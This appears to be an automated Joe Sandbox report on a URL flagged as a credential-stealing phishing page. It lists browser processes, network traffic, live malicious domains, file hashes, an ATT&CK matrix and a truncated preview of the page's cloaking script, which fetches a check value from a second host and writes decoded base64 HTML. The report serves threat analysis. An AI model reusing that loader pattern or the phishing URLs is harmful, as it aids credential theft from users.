Windows Analysis Report
https://0xl45.ateros1.com/OpLz16A1v5Gc/

Overview

General Information

Sample URL:https://0xl45.ateros1.com/OpLz16A1v5Gc/
Analysis ID:1405009
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
HTML page contains hidden URLs or javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 2620 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2204,i,10409208665149905087,14052384433586685165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 3520 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://0xl45.ateros1.com/OpLz16A1v5Gc/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: https://0xl45.ateros1.com/OpLz16A1v5Gc/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering
Source: https://0xl45.ateros1.com/OpLz16A1v5Gc/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.202.57.177:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.202.57.177:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.7.2.167:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.7.2.167:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /OpLz16A1v5Gc/ HTTP/1.1Host: 0xl45.ateros1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 0xl45.ateros1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0xl45.ateros1.com/OpLz16A1v5Gc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1Host: g461z.scharb9.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://0xl45.ateros1.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://0xl45.ateros1.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvk HTTP/1.1Host: 0xl45.ateros1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://0xl45.ateros1.com/OpLz16A1v5Gc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1Host: g461z.scharb9.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: unknownDNS traffic detected: queries for: 0xl45.ateros1.com
Source: unknownHTTP traffic detected: POST /report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 437Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Mar 2024 18:13:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 860c8ef6f9d50ad1-LAS
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Mar 2024 18:13:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 860c8f028f110a03-LAS
Source: chromecache_40.2.drString found in binary or memory: https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZH
Source: classification engineClassification label: mal48.win@17/5@10/7
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2204,i,10409208665149905087,14052384433586685165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://0xl45.ateros1.com/OpLz16A1v5Gc/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction
Source | Detection | Scanner | Label | Link
https://0xl45.ateros1.com/OpLz16A1v5Gc/ | 0% | Avira URL Cloud | safe |
https://0xl45.ateros1.com/OpLz16A1v5Gc/ | 100% | SlashNext | Credential Stealing type: Phishing & Social usering |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZH | 0% | Avira URL Cloud | safe |
https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO | 0% | Avira URL Cloud | safe |
https://0xl45.ateros1.com/favicon.ico | 0% | Avira URL Cloud | safe |
https://0xl45.ateros1.com/zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvk | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
a.nel.cloudflare.com | 35.190.80.1 | true | false | | high
0xl45.ateros1.com | 104.21.24.112 | true | false | | unknown
g461z.scharb9.com | 104.21.14.17 | true | false | | unknown
www.google.com | 142.250.101.104 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO | false | Avira URL Cloud: safe | unknown
https://a.nel.cloudflare.com/report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj | false | | high
https://0xl45.ateros1.com/zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvk | false | Avira URL Cloud: safe | unknown
https://a.nel.cloudflare.com/report/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9 | false | | high
https://0xl45.ateros1.com/OpLz16A1v5Gc/ | true | | unknown
https://0xl45.ateros1.com/favicon.ico | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZH | chromecache_40.2.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.101.104 | www.google.com | United States | | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | | unknown | unknown | false
104.21.14.17 | g461z.scharb9.com | United States | | 13335 | CLOUDFLARENETUS | false
104.21.24.112 | 0xl45.ateros1.com | United States | | 13335 | CLOUDFLARENETUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | | 15169 | GOOGLEUS | false
                  IP
                  192.168.2.16
                  192.168.2.6
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1405009
                  Start date and time:2024-03-07 19:12:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:browseurl.jbs
                  Sample URL:https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal48.win@17/5@10/7
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.251.2.94, 142.251.2.138, 142.251.2.102, 142.251.2.100, 142.251.2.113, 142.251.2.139, 142.251.2.101, 142.251.2.84, 34.104.35.123, 20.12.23.50, 192.229.211.108, 20.3.187.198, 52.165.164.15, 23.206.188.54, 23.206.188.49, 23.206.188.67, 23.206.188.32, 23.206.188.36, 23.206.188.52, 23.206.188.27, 23.206.188.28, 23.206.188.60, 142.250.101.94, 23.206.188.22
                  • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  No simulations
                  No context
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (5929), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):6560
                  Entropy (8bit):5.899784601572728
                  Encrypted:false
                  SSDEEP:96:dNjc4d9QOzzrVgMsrn+SxWA3jklvo8zpQUo6dK20OdvvtP53iaD6fd6RtrInuRIK:dNI4dH5Tc9tz4vogpo6LdvvJDSd+5Jn
                  MD5:8F35836A7CE754ED44784DFDD6D26BF3
                  SHA1:1771A67E66A29E686D874BBF4928DFC0F8675775
                  SHA-256:BA9BD1BBC448D19489806C8A3A11AEB834AB94AB7E6240965177AA3E76848B08
                  SHA-512:F10D8A0FD0A1B3B2597C1E09D320090EDFE1444EFDD9F1D70D71C357616DFFAE4F4FF6C7812C228F2AFD6857F20619DC82690E89F9CF6EA258B4CA936961A6F2
                  Malicious:false
                  Reputation:low
                  URL:https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Preview:<style>body {.. margin: 0;..}..</style>..<script>..fetch('https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO', {..method: "GET",..}).then(response => {..return response.text()..}).then(text => {..if(text == 0){..document.write(decodeURIComponent(escape(atob('
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:very short file (no magic)
                  Category:downloaded
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:low
                  URL:https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO
                  Preview:1
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:low
                  Preview:1
                  No static file info
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 7, 2024 19:13:13.109596014 CET53614321.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:13.271527052 CET53552721.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:14.265122890 CET53643761.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:14.680135012 CET5921353192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:14.680135012 CET6004053192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:14.876873016 CET53592131.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:14.877279043 CET53600401.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:15.122173071 CET5353853192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:15.122636080 CET5543453192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:15.276751995 CET53535381.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:15.277049065 CET53554341.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:15.896359921 CET6455953192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:15.896617889 CET6547553192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:16.070696115 CET53645591.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:16.070884943 CET53654751.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:16.605505943 CET6494453192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:16.606245041 CET5679453192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:16.760727882 CET53649441.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:16.761890888 CET53567941.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:17.340693951 CET5639053192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:17.342118025 CET5158853192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:17.497559071 CET53563901.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:17.497946978 CET53515881.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:31.263179064 CET53530481.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:50.294261932 CET53500561.1.1.1192.168.2.6
                  Mar 7, 2024 19:14:12.511075020 CET53538481.1.1.1192.168.2.6
                  Mar 7, 2024 19:14:13.271436930 CET53603511.1.1.1192.168.2.6
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Mar 7, 2024 19:13:14.680135012 CET | 192.168.2.6 | 1.1.1.1 | 0xc1aa | Standard query (0) | 0xl45.ateros1.com | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:14.680135012 CET | 192.168.2.6 | 1.1.1.1 | 0x3f4 | Standard query (0) | 0xl45.ateros1.com | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.122173071 CET | 192.168.2.6 | 1.1.1.1 | 0x50bd | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.122636080 CET | 192.168.2.6 | 1.1.1.1 | 0xd8ee | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.896359921 CET | 192.168.2.6 | 1.1.1.1 | 0xf09 | Standard query (0) | g461z.scharb9.com | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.896617889 CET | 192.168.2.6 | 1.1.1.1 | 0x3104 | Standard query (0) | g461z.scharb9.com | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:16.605505943 CET | 192.168.2.6 | 1.1.1.1 | 0x8dc3 | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:16.606245041 CET | 192.168.2.6 | 1.1.1.1 | 0x8f21 | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:17.340693951 CET | 192.168.2.6 | 1.1.1.1 | 0x709f | Standard query (0) | g461z.scharb9.com | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:17.342118025 CET | 192.168.2.6 | 1.1.1.1 | 0xd212 | Standard query (0) | g461z.scharb9.com | 65 | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Mar 7, 2024 19:13:14.876873016 CET | 1.1.1.1 | 192.168.2.6 | 0xc1aa | No error (0) | 0xl45.ateros1.com | | 104.21.24.112 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:14.876873016 CET | 1.1.1.1 | 192.168.2.6 | 0xc1aa | No error (0) | 0xl45.ateros1.com | | 172.67.218.90 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:14.877279043 CET | 1.1.1.1 | 192.168.2.6 | 0x3f4 | No error (0) | 0xl45.ateros1.com | | | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.276751995 CET | 1.1.1.1 | 192.168.2.6 | 0x50bd | No error (0) | www.google.com | | 142.250.101.104 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.276751995 CET | 1.1.1.1 | 192.168.2.6 | 0x50bd | No error (0) | www.google.com | | 142.250.101.147 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.276751995 CET | 1.1.1.1 | 192.168.2.6 | 0x50bd | No error (0) | www.google.com | | 142.250.101.99 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.276751995 CET | 1.1.1.1 | 192.168.2.6 | 0x50bd | No error (0) | www.google.com | | 142.250.101.106 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.276751995 CET | 1.1.1.1 | 192.168.2.6 | 0x50bd | No error (0) | www.google.com | | 142.250.101.103 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.276751995 CET | 1.1.1.1 | 192.168.2.6 | 0x50bd | No error (0) | www.google.com | | 142.250.101.105 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:15.277049065 CET | 1.1.1.1 | 192.168.2.6 | 0xd8ee | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:16.070696115 CET | 1.1.1.1 | 192.168.2.6 | 0xf09 | No error (0) | g461z.scharb9.com | | 104.21.14.17 | A (IP address) | IN (0x0001) | false
